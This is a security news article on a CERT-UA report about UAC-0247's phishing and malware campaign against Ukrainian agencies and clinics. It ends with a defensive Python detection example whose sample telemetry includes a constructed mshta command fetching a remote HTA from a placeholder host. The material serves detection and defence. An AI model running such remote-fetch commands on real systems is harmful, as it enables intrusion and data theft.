- Ukraine’s CERT-UA exposed a malware campaign targeting government and healthcare bodies, culminating in a cryptocurrency miner being installed on infected systems.
- The attackers deployed a toolkit designed to steal sensitive data from Chromium browsers and WhatsApp, using tools like ChromElevator and ZAPiXDESK.
- The final payloads included remote access tools like AGINGFLY and RAVENSHELL, as well as the XMRig cryptocurrency mining software.
- The campaign leveraged compromised websites and AI-generated fake sites in phishing emails starting in March 2026.
A threat cluster tracked as UAC-0247 has been actively targeting Ukrainian government agencies and municipal healthcare clinics, using sophisticated malware to steal data and mine cryptocurrency, according to a report from the Computer Emergency Response Team of Ukraine (CERT-UA) detailing activity from March to April 2026. The attack chain begins with a phishing email disguised as a humanitarian aid proposal, which directs victims to a compromised or AI-generated fake website.
From that site the victim downloads a Windows Shortcut (LNK) file that executes a remotely hosted HTML Application (HTA). The HTA displays a decoy form while silently fetching a binary that injects malicious shellcode into a legitimate process such as “runtimeBroker.exe.”
The infection then deploys multiple payloads for persistent access, including the RAVENSHELL reverse shell and the AGINGFLY remote access trojan. “At the same time, recent campaigns have recorded the use of a two-stage loader,” CERT-UA noted, describing its complex, encrypted structure.
The campaign’s ultimate goal is reconnaissance and data theft, carried out with open-source tools: ZAPiXDESK to decrypt WhatsApp Web data and ChromElevator to bypass browser encryption protecting cookies and passwords.
The attackers also use the RustScan network scanner and the Chisel tunnelling utility for lateral movement. A further payload discovered in the attacks is XMRig, software that mines cryptocurrency on compromised machines.
The threat is not confined to government offices: evidence suggests Ukrainian defence personnel were also targeted via malicious Signal messages. To defend against these attacks, CERT-UA recommends restricting the execution of scripts and of the specific legitimate system utilities the malware abuses.
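The LNK-to-remote-HTA chain described above, and the CERT-UA advice to restrict abusable system utilities, both translate naturally into process-creation monitoring. The following is an added example written for this article, not code from CERT-UA or from the report; it runs two detection heuristics and one allowlist policy over a handful of constructed process-creation records. The record fields, the sample command lines, the `example.invalid` host and the `C:\Tools\` allowlist are all assumptions, not indicators from the report.

```python
"""Detection heuristics for a shortcut -> remote HTA -> dropped binary chain.

Constructed example: the records below imitate the shape of a process-creation
log (Sysmon/EDR style). Field names, paths and hostnames are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the created process
    cmdline: str        # command line as logged
    parent_image: str   # full path of the parent process


# Constructed sample telemetry (not real events from the campaign).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe",
              r"C:\Windows\System32\wininit.exe"),
    # user opens the shortcut: explorer starts mshta with a remote HTA URL
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://example.invalid/aid-form.hta",
              r"C:\Windows\explorer.exe"),
    # the HTA fetches and runs a binary, which therefore has mshta as parent
    ProcEvent(300, 200, r"C:\Users\u\AppData\Local\Temp\svc.exe", "svc.exe",
              r"C:\Windows\System32\mshta.exe"),
    # benign use: a locally stored HTA from an approved tools directory
    ProcEvent(400, 100, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Tools\inventory.hta", r"C:\Windows\explorer.exe"),
]

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
APPROVED_HTA_DIRS = ["C:\\Tools\\"]   # constructed allowlist for the policy check


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_remote_hta_launch(ev: ProcEvent) -> bool:
    """mshta.exe started with a remote URL on its command line."""
    return basename(ev.image) == "mshta.exe" and bool(REMOTE_URL.search(ev.cmdline))


def is_mshta_child(ev: ProcEvent) -> bool:
    """Any process spawned by mshta.exe (in this chain, the fetched binary)."""
    return basename(ev.parent_image) == "mshta.exe"


def find_suspicious(events):
    """Return (pid, reason) pairs for every event matching a heuristic."""
    hits = []
    for ev in events:
        if is_remote_hta_launch(ev):
            hits.append((ev.pid, "mshta launched with remote URL"))
        if is_mshta_child(ev):
            hits.append((ev.pid, "child of mshta.exe"))
    return hits


def hta_argument(cmdline: str) -> str:
    """First argument after the image name, with surrounding quotes stripped."""
    parts = cmdline.split(None, 1)
    return parts[1].strip('"') if len(parts) > 1 else ""


def policy_allows(ev: ProcEvent) -> bool:
    """Allowlist policy: mshta may only run HTAs stored under approved local directories.

    Any remote URL argument is denied outright; other images are out of scope.
    """
    if basename(ev.image) != "mshta.exe":
        return True
    arg = hta_argument(ev.cmdline)
    if REMOTE_URL.search(arg):
        return False
    return any(arg.lower().startswith(d.lower()) for d in APPROVED_HTA_DIRS)


if __name__ == "__main__":
    for pid, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT pid={pid}: {reason}")
    for ev in SAMPLE_EVENTS:
        print(f"pid={ev.pid} policy={'allow' if policy_allows(ev) else 'deny'}")
```

The two heuristics are deliberately simple: one keys on the utility plus a remote argument, the other on parent-child lineage, so a chain that swaps the hosting domain or the dropped file name still trips at least one of them. The policy function shows the shape of the restriction CERT-UA recommends, expressed as a local-path allowlist rather than a blanket block, so legitimately deployed HTAs keep working.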
